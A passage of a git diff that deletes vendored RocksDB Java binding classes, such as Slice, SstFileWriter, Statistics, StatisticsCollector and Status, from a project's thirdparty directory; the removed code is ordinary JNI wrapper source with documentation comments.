-   * underlying native RocksDB C++ object.
-   */
-  protected final long nativeHandle_;
-
-  protected RocksObject(final long nativeHandle) {
-    super(true);
-    this.nativeHandle_ = nativeHandle;
-  }
-
-  /**
-   * Deletes underlying C++ object pointer.
-   */
-  @Override
-  protected void disposeInternal() {
-    disposeInternal(nativeHandle_);
-  }
-
-  protected abstract void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/SkipListMemTableConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/SkipListMemTableConfig.java
deleted file mode 100644
index e31e199..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/SkipListMemTableConfig.java
+++ /dev/null
@@ -1,50 +0,0 @@
-package org.rocksdb;
-
-/**
- * The config for skip-list memtable representation.
- */
-public class SkipListMemTableConfig extends MemTableConfig {
-
-  public static final long DEFAULT_LOOKAHEAD = 0;
-
-  /**
-   * SkipListMemTableConfig constructor
-   */
-  public SkipListMemTableConfig() {
-    lookahead_ = DEFAULT_LOOKAHEAD;
-  }
-
-  /**
-   * Sets lookahead for SkipList
-   *
-   * @param lookahead If non-zero, each iterator's seek operation
-   *     will start the search from the previously visited record
-   *     (doing at most 'lookahead' steps). This is an
-   *     optimization for the access pattern including many
-   *     seeks with consecutive keys.
-   * @return the current instance of SkipListMemTableConfig
-   */
-  public SkipListMemTableConfig setLookahead(final long lookahead) {
-    lookahead_ = lookahead;
-    return this;
-  }
-
-  /**
-   * Returns the currently set lookahead value.
-   *
-   * @return lookahead value
-   */
-  public long lookahead() {
-    return lookahead_;
-  }
-
-
-  @Override protected long newMemTableFactoryHandle() {
-    return newMemTableFactoryHandle0(lookahead_);
-  }
-
-  private native long newMemTableFactoryHandle0(long lookahead)
-      throws IllegalArgumentException;
-
-  private long lookahead_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Slice.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Slice.java
deleted file mode 100644
index a122c37..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Slice.java
+++ /dev/null
@@ -1,112 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * <p>Base class for slices which will receive
- * byte[] based access to the underlying data.</p>
- *
- * <p>byte[] backed slices typically perform better with
- * small keys and values. When using larger keys and
- * values consider using {@link org.rocksdb.DirectSlice}</p>
- */
-public class Slice extends AbstractSlice<byte[]> {
-
-  /**
-   * Indicates whether we have to free the memory pointed to by the Slice
-   */
-  private volatile boolean cleared;
-  private volatile long internalBufferOffset = 0;
-
-  /**
-   * <p>Called from JNI to construct a new Java Slice
-   * without an underlying C++ object set
-   * at creation time.</p>
-   *
-   * <p>Note: You should be aware that
-   * {@see org.rocksdb.RocksObject#disOwnNativeHandle()} is intentionally
-   * called from the default Slice constructor, and that it is marked as
-   * private. This is so that developers cannot construct their own default
-   * Slice objects (at present). As developers cannot construct their own
-   * Slice objects through this, they are not creating underlying C++ Slice
-   * objects, and so there is nothing to free (dispose) from Java.</p>
-   */
-  @SuppressWarnings("unused")
-  private Slice() {
-    super();
-  }
-
-  /**
-   * <p>Constructs a slice where the data is taken from
-   * a String.</p>
-   *
-   * @param str String value.
-   */
-  public Slice(final String str) {
-    super(createNewSliceFromString(str));
-  }
-
-  /**
-   * <p>Constructs a slice where the data is a copy of
-   * the byte array from a specific offset.</p>
-   *
-   * @param data byte array.
-   * @param offset offset within the byte array.
-   */
-  public Slice(final byte[] data, final int offset) {
-    super(createNewSlice0(data, offset));
-  }
-
-  /**
-   * <p>Constructs a slice where the data is a copy of
-   * the byte array.</p>
-   *
-   * @param data byte array.
-   */
-  public Slice(final byte[] data) {
-    super(createNewSlice1(data));
-  }
-
-  @Override
-  public void clear() {
-    clear0(getNativeHandle(), !cleared, internalBufferOffset);
-    cleared = true;
-  }
-
-  @Override
-  public void removePrefix(final int n) {
-    removePrefix0(getNativeHandle(), n);
-    this.internalBufferOffset += n;
-  }
-
-  /**
-   * <p>Deletes underlying C++ slice pointer
-   * and any buffered data.</p>
-   *
-   * <p>
-   * Note that this function should be called only after all
-   * RocksDB instances referencing the slice are closed.
-   * Otherwise an undefined behavior will occur.</p>
-   */
-  @Override
-  protected void disposeInternal() {
-    final long nativeHandle = getNativeHandle();
-    if(!cleared) {
-      disposeInternalBuf(nativeHandle, internalBufferOffset);
-    }
-    super.disposeInternal(nativeHandle);
-  }
-
-  @Override protected final native byte[] data0(long handle);
-  private native static long createNewSlice0(final byte[] data,
-      final int length);
-  private native static long createNewSlice1(final byte[] data);
-  private native void clear0(long handle, boolean internalBuffer,
-      long internalBufferOffset);
-  private native void removePrefix0(long handle, int length);
-  private native void disposeInternalBuf(final long handle,
-      long internalBufferOffset);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Snapshot.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Snapshot.java
deleted file mode 100644
index a6b53f4..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Snapshot.java
+++ /dev/null
@@ -1,37 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Snapshot of database
- */
-public class Snapshot extends RocksObject {
-  Snapshot(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  /**
-   * Return the associated sequence number;
-   *
-   * @return the associated sequence number of
-   *     this snapshot.
-   */
-  public long getSequenceNumber() {
-    assert(isOwningHandle());
-    return getSequenceNumber(nativeHandle_);
-  }
-
-  /**
-   * Dont release C++ Snapshot pointer. The pointer
-   * to the snapshot is released by the database
-   * instance.
-   */
-  @Override
-  protected final void disposeInternal(final long handle) {
-  }
-
-  private native long getSequenceNumber(long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/SstFileWriter.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/SstFileWriter.java
deleted file mode 100644
index 5f35f0f..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/SstFileWriter.java
+++ /dev/null
@@ -1,256 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * SstFileWriter is used to create sst files that can be added to the
- * database later. All keys in files generated by SstFileWriter will have
- * sequence number = 0.
- */
-public class SstFileWriter extends RocksObject {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  /**
-   * SstFileWriter Constructor.
-   *
-   * @param envOptions {@link org.rocksdb.EnvOptions} instance.
-   * @param options {@link org.rocksdb.Options} instance.
-   * @param comparator the comparator to specify the ordering of keys.
-   *
-   * @deprecated Use {@link #SstFileWriter(EnvOptions, Options)}.
-   * Passing an explicit comparator is deprecated in lieu of passing the
-   * comparator as part of options. Use the other constructor instead.
-   */
-  @Deprecated
-  public SstFileWriter(final EnvOptions envOptions, final Options options,
-      final AbstractComparator<? extends AbstractSlice<?>> comparator) {
-    super(newSstFileWriter(
-        envOptions.nativeHandle_, options.nativeHandle_, comparator.getNativeHandle()));
-  }
-
-  /**
-   * SstFileWriter Constructor.
-   *
-   * @param envOptions {@link org.rocksdb.EnvOptions} instance.
-   * @param options {@link org.rocksdb.Options} instance.
-   */
-  public SstFileWriter(final EnvOptions envOptions, final Options options) {
-    super(newSstFileWriter(
-        envOptions.nativeHandle_, options.nativeHandle_));
-  }
-
-  /**
-   * Prepare SstFileWriter to write to a file.
-   *
-   * @param filePath the location of file
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void open(final String filePath) throws RocksDBException {
-    open(nativeHandle_, filePath);
-  }
-
-  /**
-   * Add a Put key with value to currently opened file.
-   *
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @deprecated Use {@link #put(Slice, Slice)}
-   */
-  @Deprecated
-  public void add(final Slice key, final Slice value)
-      throws RocksDBException {
-    put(nativeHandle_, key.getNativeHandle(), value.getNativeHandle());
-  }
-
-  /**
-   * Add a Put key with value to currently opened file.
-   *
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @deprecated Use {@link #put(DirectSlice, DirectSlice)}
-   */
-  @Deprecated
-  public void add(final DirectSlice key, final DirectSlice value)
-      throws RocksDBException {
-    put(nativeHandle_, key.getNativeHandle(), value.getNativeHandle());
-  }
-
-  /**
-   * Add a Put key with value to currently opened file.
-   *
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void put(final Slice key, final Slice value) throws RocksDBException {
-    put(nativeHandle_, key.getNativeHandle(), value.getNativeHandle());
-  }
-
-  /**
-   * Add a Put key with value to currently opened file.
-   *
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void put(final DirectSlice key, final DirectSlice value)
-      throws RocksDBException {
-    put(nativeHandle_, key.getNativeHandle(), value.getNativeHandle());
-  }
-
- /**
-   * Add a Put key with value to currently opened file.
-   *
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-public void put(final byte[] key, final byte[] value)
-    throws RocksDBException {
-  put(nativeHandle_, key, value);
-}
-
-  /**
-   * Add a Merge key with value to currently opened file.
-   *
-   * @param key the specified key to be merged.
-   * @param value the value to be merged with the current value for
-   * the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void merge(final Slice key, final Slice value)
-      throws RocksDBException {
-    merge(nativeHandle_, key.getNativeHandle(), value.getNativeHandle());
-  }
-
-  /**
-   * Add a Merge key with value to currently opened file.
-   *
-   * @param key the specified key to be merged.
-   * @param value the value to be merged with the current value for
-   * the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void merge(final byte[] key, final byte[] value)
-      throws RocksDBException {
-    merge(nativeHandle_, key, value);
-  }
-
-  /**
-   * Add a Merge key with value to currently opened file.
-   *
-   * @param key the specified key to be merged.
-   * @param value the value to be merged with the current value for
-   * the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void merge(final DirectSlice key, final DirectSlice value)
-      throws RocksDBException {
-    merge(nativeHandle_, key.getNativeHandle(), value.getNativeHandle());
-  }
-
-  /**
-   * Add a deletion key to currently opened file.
-   *
-   * @param key the specified key to be deleted.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void delete(final Slice key) throws RocksDBException {
-    delete(nativeHandle_, key.getNativeHandle());
-  }
-
-  /**
-   * Add a deletion key to currently opened file.
-   *
-   * @param key the specified key to be deleted.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void delete(final DirectSlice key) throws RocksDBException {
-    delete(nativeHandle_, key.getNativeHandle());
-  }
-
-  /**
-   * Add a deletion key to currently opened file.
-   *
-   * @param key the specified key to be deleted.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void delete(final byte[] key) throws RocksDBException {
-    delete(nativeHandle_, key);
-  }
-
-  /**
-   * Finish the process and close the sst file.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void finish() throws RocksDBException {
-    finish(nativeHandle_);
-  }
-
-  private native static long newSstFileWriter(
-      final long envOptionsHandle, final long optionsHandle,
-      final long userComparatorHandle);
-
-  private native static long newSstFileWriter(final long envOptionsHandle,
-      final long optionsHandle);
-
-  private native void open(final long handle, final String filePath)
-      throws RocksDBException;
-
-  private native void put(final long handle, final long keyHandle,
-      final long valueHandle) throws RocksDBException;
-      
-  private native void put(final long handle, final byte[] key,
-      final byte[] value) throws RocksDBException;
-
-  private native void merge(final long handle, final long keyHandle,
-      final long valueHandle) throws RocksDBException;
-
-  private native void merge(final long handle, final byte[] key,
-      final byte[] value) throws RocksDBException;
-
-  private native void delete(final long handle, final long keyHandle)
-      throws RocksDBException;
-
-  private native void delete(final long handle, final byte[] key)
-      throws RocksDBException;
-
-  private native void finish(final long handle) throws RocksDBException;
-
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Statistics.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Statistics.java
deleted file mode 100644
index 10c072c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Statistics.java
+++ /dev/null
@@ -1,149 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.EnumSet;
-
-/**
- * Statistics to analyze the performance of a db. Pointer for statistics object
- * is managed by Options class.
- */
-public class Statistics extends RocksObject {
-
-  public Statistics() {
-    super(newStatistics());
-  }
-
-  public Statistics(final Statistics otherStatistics) {
-    super(newStatistics(otherStatistics.nativeHandle_));
-  }
-
-  public Statistics(final EnumSet<HistogramType> ignoreHistograms) {
-    super(newStatistics(toArrayValues(ignoreHistograms)));
-  }
-
-  public Statistics(final EnumSet<HistogramType> ignoreHistograms, final Statistics otherStatistics) {
-    super(newStatistics(toArrayValues(ignoreHistograms), otherStatistics.nativeHandle_));
-  }
-
-  /**
-   * Intentionally package-private.
-   *
-   * Used from {@link DBOptions#statistics()}
-   *
-   * @param existingStatisticsHandle The C++ pointer to an existing statistics object
-   */
-  Statistics(final long existingStatisticsHandle) {
-    super(existingStatisticsHandle);
-  }
-
-  private static byte[] toArrayValues(final EnumSet<HistogramType> histogramTypes) {
-    final byte[] values = new byte[histogramTypes.size()];
-    int i = 0;
-    for(final HistogramType histogramType : histogramTypes) {
-      values[i++] = histogramType.getValue();
-    }
-    return values;
-  }
-
-  /**
-   * Gets the current stats level.
-   *
-   * @return The stats level.
-   */
-  public StatsLevel statsLevel() {
-    return StatsLevel.getStatsLevel(statsLevel(nativeHandle_));
-  }
-
-  /**
-   * Sets the stats level.
-   *
-   * @param statsLevel The stats level to set.
-   */
-  public void setStatsLevel(final StatsLevel statsLevel) {
-    setStatsLevel(nativeHandle_, statsLevel.getValue());
-  }
-
-  /**
-   * Get the count for a ticker.
-   *
-   * @param tickerType The ticker to get the count for
-   *
-   * @return The count for the ticker
-   */
-  public long getTickerCount(final TickerType tickerType) {
-    assert(isOwningHandle());
-    return getTickerCount(nativeHandle_, tickerType.getValue());
-  }
-
-  /**
-   * Get the count for a ticker and reset the tickers count.
-   *
-   * @param tickerType The ticker to get the count for
-   *
-   * @return The count for the ticker
-   */
-  public long getAndResetTickerCount(final TickerType tickerType) {
-    assert(isOwningHandle());
-    return getAndResetTickerCount(nativeHandle_, tickerType.getValue());
-  }
-
-  /**
-   * Gets the histogram data for a particular histogram.
-   *
-   * @param histogramType The histogram to retrieve the data for
-   *
-   * @return The histogram data
-   */
-  public HistogramData getHistogramData(final HistogramType histogramType) {
-    assert(isOwningHandle());
-    return getHistogramData(nativeHandle_, histogramType.getValue());
-  }
-
-  /**
-   * Gets a string representation of a particular histogram.
-   *
-   * @param histogramType The histogram to retrieve the data for
-   *
-   * @return A string representation of the histogram data
-   */
-  public String getHistogramString(final HistogramType histogramType) {
-    assert(isOwningHandle());
-    return getHistogramString(nativeHandle_, histogramType.getValue());
-  }
-
-  /**
-   * Resets all ticker and histogram stats.
-   */
-  public void reset() throws RocksDBException {
-    assert(isOwningHandle());
-    reset(nativeHandle_);
-  }
-
-  /**
-   * String representation of the statistic object.
-   */
-  public String toString() {
-    assert(isOwningHandle());
-    return toString(nativeHandle_);
-  }
-
-  private native static long newStatistics();
-  private native static long newStatistics(final long otherStatisticsHandle);
-  private native static long newStatistics(final byte[] ignoreHistograms);
-  private native static long newStatistics(final byte[] ignoreHistograms, final long otherStatisticsHandle);
-
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native byte statsLevel(final long handle);
-  private native void setStatsLevel(final long handle, final byte statsLevel);
-  private native long getTickerCount(final long handle, final byte tickerType);
-  private native long getAndResetTickerCount(final long handle, final byte tickerType);
-  private native HistogramData getHistogramData(final long handle, final byte histogramType);
-  private native String getHistogramString(final long handle, final byte histogramType);
-  private native void reset(final long nativeHandle) throws RocksDBException;
-  private native String toString(final long nativeHandle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatisticsCollector.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatisticsCollector.java
deleted file mode 100644
index 48cf8af..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatisticsCollector.java
+++ /dev/null
@@ -1,111 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.List;
-import java.util.concurrent.Executors;
-import java.util.concurrent.ExecutorService;
-import java.util.concurrent.TimeUnit;
-
-/**
- * <p>Helper class to collect DB statistics periodically at a period specified in
- * constructor. Callback function (provided in constructor) is called with
- * every statistics collection.</p>
- *
- * <p>Caller should call start() to start statistics collection. Shutdown() should
- * be called to stop stats collection and should be called before statistics (
- * provided in constructor) reference has been disposed.</p>
- */
-public class StatisticsCollector {
-  private final List<StatsCollectorInput> _statsCollectorInputList;
-  private final ExecutorService _executorService;
-  private final int _statsCollectionInterval;
-  private volatile boolean _isRunning = true;
-
-  /**
-   * Constructor for statistics collector.
-   *
-   * @param statsCollectorInputList List of statistics collector input.
-   * @param statsCollectionIntervalInMilliSeconds Statistics collection time
-   *        period (specified in milliseconds).
-   */
-  public StatisticsCollector(
-      final List<StatsCollectorInput> statsCollectorInputList,
-      final int statsCollectionIntervalInMilliSeconds) {
-    _statsCollectorInputList = statsCollectorInputList;
-    _statsCollectionInterval = statsCollectionIntervalInMilliSeconds;
-
-    _executorService = Executors.newSingleThreadExecutor();
-  }
-
-  public void start() {
-    _executorService.submit(collectStatistics());
-  }
-
-  /**
-   * Shuts down statistics collector.
-   *
-   * @param shutdownTimeout Time in milli-seconds to wait for shutdown before
-   *        killing the collection process.
-   * @throws java.lang.InterruptedException thrown if Threads are interrupted.
-   */
-  public void shutDown(final int shutdownTimeout) throws InterruptedException {
-    _isRunning = false;
-
-    _executorService.shutdownNow();
-    // Wait for collectStatistics runnable to finish so that disposal of
-    // statistics does not cause any exceptions to be thrown.
-    _executorService.awaitTermination(shutdownTimeout, TimeUnit.MILLISECONDS);
-  }
-
-  private Runnable collectStatistics() {
-    return new Runnable() {
-
-      @Override
-      public void run() {
-        while (_isRunning) {
-          try {
-            if(Thread.currentThread().isInterrupted()) {
-              break;
-            }
-            for(final StatsCollectorInput statsCollectorInput :
-                _statsCollectorInputList) {
-              Statistics statistics = statsCollectorInput.getStatistics();
-              StatisticsCollectorCallback statsCallback =
-                  statsCollectorInput.getCallback();
-
-              // Collect ticker data
-              for(final TickerType ticker : TickerType.values()) {
-                if(ticker != TickerType.TICKER_ENUM_MAX) {
-                  final long tickerValue = statistics.getTickerCount(ticker);
-                  statsCallback.tickerCallback(ticker, tickerValue);
-                }
-              }
-
-              // Collect histogram data
-              for(final HistogramType histogramType : HistogramType.values()) {
-                if(histogramType != HistogramType.HISTOGRAM_ENUM_MAX) {
-                  final HistogramData histogramData =
-                          statistics.getHistogramData(histogramType);
-                  statsCallback.histogramCallback(histogramType, histogramData);
-                }
-              }
-
-              Thread.sleep(_statsCollectionInterval);
-            }
-          }
-          catch (final InterruptedException e) {
-            Thread.currentThread().interrupt();
-            break;
-          }
-          catch (final Exception e) {
-            throw new RuntimeException("Error while calculating statistics", e);
-          }
-        }
-      }
-    };
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatisticsCollectorCallback.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatisticsCollectorCallback.java
deleted file mode 100644
index f3785b1..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatisticsCollectorCallback.java
+++ /dev/null
@@ -1,32 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Callback interface provided to StatisticsCollector.
- *
- * Thread safety:
- * StatisticsCollector doesn't make any guarantees about thread safety.
- * If the same reference of StatisticsCollectorCallback is passed to multiple
- * StatisticsCollector references, then its the responsibility of the
- * user to make StatisticsCollectorCallback's implementation thread-safe.
- *
- */
-public interface StatisticsCollectorCallback {
-  /**
-   * Callback function to get ticker values.
-   * @param tickerType Ticker type.
-   * @param tickerCount Value of ticker type.
-  */
-  void tickerCallback(TickerType tickerType, long tickerCount);
-
-  /**
-   * Callback function to get histogram values.
-   * @param histType Histogram type.
-   * @param histData Histogram data.
-  */
-  void histogramCallback(HistogramType histType, HistogramData histData);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatsCollectorInput.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatsCollectorInput.java
deleted file mode 100644
index 5bf43ad..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatsCollectorInput.java
+++ /dev/null
@@ -1,35 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Contains all information necessary to collect statistics from one instance
- * of DB statistics.
- */
-public class StatsCollectorInput {
-  private final Statistics _statistics;
-  private final StatisticsCollectorCallback _statsCallback;
-
-  /**
-   * Constructor for StatsCollectorInput.
-   *
-   * @param statistics Reference of DB statistics.
-   * @param statsCallback Reference of statistics callback interface.
-   */
-  public StatsCollectorInput(final Statistics statistics,
-      final StatisticsCollectorCallback statsCallback) {
-    _statistics = statistics;
-    _statsCallback = statsCallback;
-  }
-
-  public Statistics getStatistics() {
-    return _statistics;
-  }
-
-  public StatisticsCollectorCallback getCallback() {
-    return _statsCallback;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatsLevel.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatsLevel.java
deleted file mode 100644
index cc2a87c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatsLevel.java
+++ /dev/null
@@ -1,65 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * The level of Statistics to report.
- */
-public enum StatsLevel {
-    /**
-     * Collect all stats except time inside mutex lock AND time spent on
-     * compression.
-     */
-    EXCEPT_DETAILED_TIMERS((byte) 0x0),
-
-    /**
-     * Collect all stats except the counters requiring to get time inside the
-     * mutex lock.
-     */
-    EXCEPT_TIME_FOR_MUTEX((byte) 0x1),
-
-    /**
-     * Collect all stats, including measuring duration of mutex operations.
-     *
-     * If getting time is expensive on the platform to run, it can
-     * reduce scalability to more threads, especially for writes.
-     */
-    ALL((byte) 0x2);
-
-    private final byte value;
-
-    StatsLevel(final byte value) {
-        this.value = value;
-    }
-
-    /**
-     * <p>Returns the byte value of the enumerations value.</p>
-     *
-     * @return byte representation
-     */
-    public byte getValue() {
-        return value;
-    }
-
-    /**
-     * Get StatsLevel by byte value.
-     *
-     * @param value byte representation of StatsLevel.
-     *
-     * @return {@link org.rocksdb.StatsLevel} instance.
-     * @throws java.lang.IllegalArgumentException if an invalid
-     *     value is provided.
-     */
-    public static StatsLevel getStatsLevel(final byte value) {
-        for (final StatsLevel statsLevel : StatsLevel.values()) {
-            if (statsLevel.getValue() == value){
-                return statsLevel;
-            }
-        }
-        throw new IllegalArgumentException(
-                "Illegal value provided for InfoLogLevel.");
-    }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Status.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Status.java
deleted file mode 100644
index d34b72c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Status.java
+++ /dev/null
@@ -1,113 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Represents the status returned by a function call in RocksDB.
- *
- * Currently only used with {@link RocksDBException} when the
- * status is not {@link Code#Ok}
- */
-public class Status {
-  private final Code code;
-  /* @Nullable */ private final SubCode subCode;
-  /* @Nullable */ private final String state;
-
-  public Status(final Code code, final SubCode subCode, final String state) {
-    this.code = code;
-    this.subCode = subCode;
-    this.state = state;
-  }
-
-  /**
-   * Intentionally private as this will be called from JNI
-   */
-  private Status(final byte code, final byte subCode, final String state) {
-    this.code = Code.getCode(code);
-    this.subCode = SubCode.getSubCode(subCode);
-    this.state = state;
-  }
-
-  public Code getCode() {
-    return code;
-  }
-
-  public SubCode getSubCode() {
-    return subCode;
-  }
-
-  public String getState() {
-    return state;
-  }
-
-  public String getCodeString() {
-    final StringBuilder builder = new StringBuilder()
-        .append(code.name());
-    if(subCode != null && subCode != SubCode.None) {
-      builder.append("(")
-          .append(subCode.name())
-          .append(")");
-    }
-    return builder.toString();
-  }
-
-  public enum Code {
-    Ok(                 (byte)0x0),
-    NotFound(           (byte)0x1),
-    Corruption(         (byte)0x2),
-    NotSupported(       (byte)0x3),
-    InvalidArgument(    (byte)0x4),
-    IOError(            (byte)0x5),
-    MergeInProgress(    (byte)0x6),
-    Incomplete(         (byte)0x7),
-    ShutdownInProgress( (byte)0x8),
-    TimedOut(           (byte)0x9),
-    Aborted(            (byte)0xA),
-    Busy(               (byte)0xB),
-    Expired(            (byte)0xC),
-    TryAgain(           (byte)0xD);
-
-    private final byte value;
-
-    Code(final byte value) {
-      this.value = value;
-    }
-
-    public static Code getCode(final byte value) {
-      for (final Code code : Code.values()) {
-        if (code.value == value){
-          return code;
-        }
-      }
-      throw new IllegalArgumentException(
-          "Illegal value provided for Code.");
-    }
-  }
-
-  public enum SubCode {
-    None(         (byte)0x0),
-    MutexTimeout( (byte)0x1),
-    LockTimeout(  (byte)0x2),
-    LockLimit(    (byte)0x3),
-    MaxSubCode(   (byte)0x7E);
-
-    private final byte value;
-
-    SubCode(final byte value) {
-      this.value = value;
-    }
-
-    public static SubCode getSubCode(final byte value) {
-      for (final SubCode subCode : SubCode.values()) {
-        if (subCode.value == value){
-          return subCode;
-        }
-      }
-      throw new IllegalArgumentException(
-          "Illegal value provided for SubCode.");
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StringAppendOperator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StringAppendOperator.java
deleted file mode 100644
index 85c36ad..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StringAppendOperator.java
+++ /dev/null
@@ -1,19 +0,0 @@
-// Copyright (c) 2014, Vlad Balan (vlad.gm@gmail.com).  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * StringAppendOperator is a merge operator that concatenates
- * two strings.
- */
-public class StringAppendOperator extends MergeOperator {
-    public StringAppendOperator() {
-        super(newSharedStringAppendOperator());
-    }
-
-    private native static long newSharedStringAppendOperator();
-    @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TableFormatConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TableFormatConfig.java
deleted file mode 100644
index dbe524c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TableFormatConfig.java
+++ /dev/null
@@ -1,22 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-/**
- * TableFormatConfig is used to config the internal Table format of a RocksDB.
- * To make a RocksDB to use a specific Table format, its associated
- * TableFormatConfig should be properly set and passed into Options via
- * Options.setTableFormatConfig() and open the db using that Options.
- */
-public abstract class TableFormatConfig {
-  /**
-   * <p>This function should only be called by Options.setTableFormatConfig(),
-   * which will create a c++ shared-pointer to the c++ TableFactory
-   * that associated with the Java TableFormatConfig.</p>
-   *
-   * @return native handle address to native table instance.
-   */
-  abstract protected long newTableFactoryHandle();
-}
